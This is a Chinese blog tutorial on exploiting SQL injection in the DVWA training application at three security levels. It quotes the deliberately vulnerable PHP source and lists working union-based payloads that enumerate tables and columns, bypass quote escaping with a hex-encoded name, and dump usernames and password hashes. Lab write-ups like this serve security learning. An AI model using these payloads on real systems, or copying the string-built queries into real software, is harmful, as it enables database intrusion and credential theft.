DVWA ---SQL Injection

最新推荐文章于 2024-05-27 18:02:49 发布
最新推荐文章于 2024-05-27 18:02:49 发布
阅读量289 收藏
点赞数 1
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wu000999/article/details/84580928
版权

手工注入的一般步骤:

    1.判断是否存在注入,注入是字符型还是数字型

    2.猜解SQL查询语句中的字段数

    3.确定显示的字段顺序

    4.获取当前数据库

    5.获取数据库中的表

    6.获取表中的字段名

    7.下载数据

dvwa中的代码分析

Low

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}

?>

可以看到代码没有对数据进行任何的过滤。

所以直接进行漏洞利用
1.判断是否存在注入,注入是字符型还是数字型
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

所以后台应用程序是将数据当作字符串处理。

2.猜解SQL查询语句中的字段数

输入1′ or 1=1 order by 数字 #
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

当数字为2时能正确显示,为3时提示错误,所以有两个字段。

3.确定显示的字段顺序

输入1′ union select 1,2 #
在这里插入图片描述

4.获取当前数据库

输入1′ union select 1,database() #
在这里插入图片描述

5.获取数据库中的表

输入1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
在这里插入图片描述

6.获取表中的字段名
输入1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #
在这里插入图片描述
7.下载数据

输入1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
在这里插入图片描述

Medium

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Display values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    //mysql_close();
}

?>

可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。
在这里插入图片描述

漏洞利用

使用burpsuite抓包改数据。
在这里插入图片描述
1.判断是否存在注入,注入是字符型还是数字型
在这里插入图片描述

所以可以判断是数字型注入。由于是数字型注入,服务器端的mysql_real_escape_string函数就形同虚设了,因为数字型注入并不需要借助引号。

2.猜解SQL查询语句中的字段数
更改参数id为1 order by 2 #
在这里插入图片描述

3.确定显示的字段顺序
更改参数id为1 union select 1,2#
在这里插入图片描述
4.获取当前数据库
更改参数id为1 union select 1,database() #
在这里插入图片描述
5.获取数据库中的表
更改参数id为1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
在这里插入图片描述

6.获取表中的字段名
数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=’users ’#
在这里插入图片描述
查询失败,因为包含了单引号,单引号会被转义为\’。

可以利用16进制进行绕过,更改为
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #
在这里插入图片描述
7.下载数据
修改参数id为
1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
在这里插入图片描述

High

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysql_query( $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}

?>

虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。由于手工注入的过程与Low级别基本一样,直接最后一步演示下载数据。

输入1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

孤君
关注
专栏目录
渗透测试之DVWA的Medium级别的SQL注入
追风筝的孩子
08-14 6345
Medium SQL Injection Source是通过一个下拉表的方式提交数据的。选择数据后提交,发现URL不是GET注入,是把提交的数据存放到post数据中 先把源代码放出来 &lt;?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = mysql_real_e...
DVWA - SQL Injection (medium)
qq_42630215的博客
05-28 297
medium级别(手工注入 和 sqlmap工具注入) 手工注入 因为该级别设置了下拉菜单,提交后URL中没有显示ID,提交方式为POST,所以用burpsuite抓包,更改参数。 1.判断是否存在注入,注入的类型是字符型还是数字型 id=1&Submit=Submit id=1’ &Submit=Submit id=1 and 1=1&Submit=Submit id=1 and 1=2&Submit=Submit 2.猜测字段数 3.确定显示的字段顺序 4.获取当
DVWA-SQL Injection(SQL注入)
简简的博客
02-02 608
本系列文集:DVWA学习笔记 SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 SQL 注入分类 按SQLMap中的分类来看,SQL注入类型有以下 5 种: UNION query SQL injection(可联合查询...
DVWA setup.php权限 错误
tasty
09-09 6209
Writable folder /var/www/html/DVWA-1.9/hackable/uploads/: NO) Writable file /var/www/html/DVWA-1.9/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt: NO sudo chmod 777 uploads sudo chmod 777 ph
DVWA(linux下)利用sqlmap进行--os-shell注入不能成功的错误处理
Spwpun的博客
11-16 9829
报错情况: 我在自己的kali linux虚拟机下面安装了DVWA渗透测试系统以便自己进行渗透测试的基础学习,在进行sqli(sql injection)-low级别的测试的时候,利用sqlmap进行注入,加上–os-shell参数获取shell(即系统下的命令行,windows下的cmd,linux下的terminal),发现不能执行。 最后总是报这样的错,unable to uploa...
DVWA-SQL Injection
最新发布
05-27 1023
1.首先判断注入类型输入1 and 1=2(永假式),如果是数字型注入页面会报错,所以这儿是个字符型注入(字符型和数字型的区别就是有没有单引号闭合)2.order by猜解列最大的不报错的数为可控列数3. 查看显位4. 查看数据库信息因为数据库是mysql,我们可以使用database(),version(),user()来获取信息。获取到数据库名字为dvwa,用户为root5. 从information_schema中读数据首先读dvwa库的表名。
DVWA-SQL Injection (Blind)
qq_45751902的博客
04-25 864
目录简介sql盲注SQL盲注的类型安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible 简介 sql盲注 SQL Injection(Blind),即SQL盲注; 注入:可以查看到详细内容; 盲注:目标只会回复是或不是,没有详细内容; SQL盲注的类型 基于布尔值的盲注; 基于时间的盲注; 基于报错的盲注; 安全级别:Low 安全级别:Medium 安全级别:High 安全级别:Impossible ...
DVWA-SQL Injection 全级别教程
weixin_44716769的博客
09-08 598
SQL Injection 实验准备 Low 判断是否存在注入,注入是字符型还是数字型 当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。 输入1,查询成功 输入1’ and ‘1’ ='2,查询失败,返回结果为空。说明不存在数字型注入漏洞 输入1’ or ‘1234’='1234,查询成功。说明存在字符型注入 猜SQL查询语句中的字段数 输入1’ or 1=1 order by 1 #,查询成功 #是注释作用 输入
DVWA - SQL - Injection <low>
m0_62102000的博客
09-16 198
DVWA - SQL - Injection <low>
DVWA-SQL Injection(Blind)
tycyj的博客
01-24 203
LOW 1.判断是否存在注入 输入1 显示用户存在 输入1’ and 1 = 1 – ’ 显示用户存在 输入1‘ and 1 = 2 – ’ 显示用户不存在,说明存在字符型的SQL盲注。 2.猜解SQL查询语句中的字段数 输入1’ or 1 = 1 order by 1 – ’ 显示不存在 输入1’ or 1 = 1 order by 2 – ’ 显示存在 输入1’ or 1 = 1 order by 3 – ’ 显示不存在,说明该SQL查询语句中只有2个字段 3.获取当前数据库 输入1’ and
DVWA-master.zip
03-13
1. SQL注入(SQL Injection):这是Web应用中最常见的一种安全漏洞,允许攻击者通过构造恶意的SQL语句来获取、修改或删除数据库中的数据。在DVWA中,你可以学习如何识别SQL注入点,以及如何利用它们执行任意的SQL...
DVWA--SQL注入(SQL Injection)--Medium
JakeLin's Blog
06-16 882
DVWA--SQL注入(SQL Injection)--Low 目录 级别:Medium 1、查看POST请求 2、hackbar提交POST请求 3、输入',报错,判断为数字型注入 4、猜测SQL查询的字段数 5、确定回显的位置 6、获取当前数据库及版本信息 7、获取数据库中表信息(group_concat()) 8、获取表字段 9、获取用户信息 10、密文解码 后台源码 级别:Medium Medium级别的代码利用mysql_real_escape_string函数对特.
SQL中的and、or
热门推荐
孤的博客
07-17 1万+
sql查询语句中长用到and和or,它们在用的时候有些需要注意的地方 不管在一项表达式中有多少个and或or,它是将前一个表达式看作一项,and与or后的所有表达式看做一项。 and的前后都为真的时候才为真,取交集 or有一个为真,即为真,取并集 select * from users where 1=1; # 1=1 即全集 select * from users where id...
SQL注入点的判断
孤的博客
04-02 5420
分类 1、常见的sql注入按照参数类型可分为两种:数字型和字符型。 当发生注入点的参数为整数时,比如 ID,num,page等,这种形式的就属于数字型注入漏洞。同样,当注入点是字符串时,则称为字符型注入,字符型注入需要引号来闭合。 2、也可以根据数据库返回的结果,分为回显注入、报错注入、盲注。 回显注入:可以直接在存在注入点的当前页面中获取返回结果。 报错注入:程序将数据库的返回错误信息直接显示在...
SQL注入测试
孤的博客
10-06 3796
概述 一般通过远程测试判断是否存在SQL注入( 列如,通过internet 并作为应用渗透测试的一部分 )。所以通常没有机会通过查看源代码来复查注入的查询的结构,因此常常需要进行大量的测试。 寻找SQL注入 SQL注入可以出现在任何从系统或用户接收数据输入的前端应用程序中,这些应用程序之后被用于访问数据库服务器。 在Web环境中,Web浏览器是客户端,它扮演向用户请求数据并将数据发送到远程服务器的...
SQL注入中数据库的判断
孤的博客
04-03 3793
方法一: 用@@datadir查看数据库安装目录,能否判断出 方法二: 通过各个数据库特有的数据表来判断 1、mssql数据库 http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1 2、access数据库 http://127.0.0.1/test.php?id=1 and (s...
SQL布尔盲注常用语句
孤的博客
08-23 3059
过程 1.判断是否存在注入,注入字符型还是数字型 2.猜解当前数据库名 数据库长度→库名 3.数据库中的表名 几个表→长度→名称 4.表中的字段名 字段个数→长度→名称 5.数据 判断 1’ and ‘1’=‘1 1’ and ‘1’='2 2.库名 1’ and length(database())>3# 1’ and length(database())=5 # 1’ and mid...
SQL手工注入---表的猜解
孤的博客
10-13 2337
手工注入过程 找到注入点→表名→列名→列长度→列值 注入点:http://www.xxx.com/index.asp?id=1 猜解表名 http://www.xxx.com/index.asp?id=1 and exists(select * from 猜测的表名) 猜解列名 http://www.xxx.com/index.asp?id=1 and exists(select 猜测的列名 fr...
常用的SQL注入语句
孤的博客
10-11 2336
SQL是一种组织、管理和检索计算机数据库村粗数据的工具,它是一种计算机语言。 每天SQL语句均由一个谓词开始,该谓词描述这条语句要产生的动作,列如SELECT或UPDATE关键字。谓词后紧接一条或多天子句,子句中给出了被谓词作用的数据或提供谓词动作的详细信息。每条子句由一个关键字开始,SELECT谓词后为FROM关键字。 局部变量(Local Variable)和全局变量(Global Varia...
dvwa sql injection
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值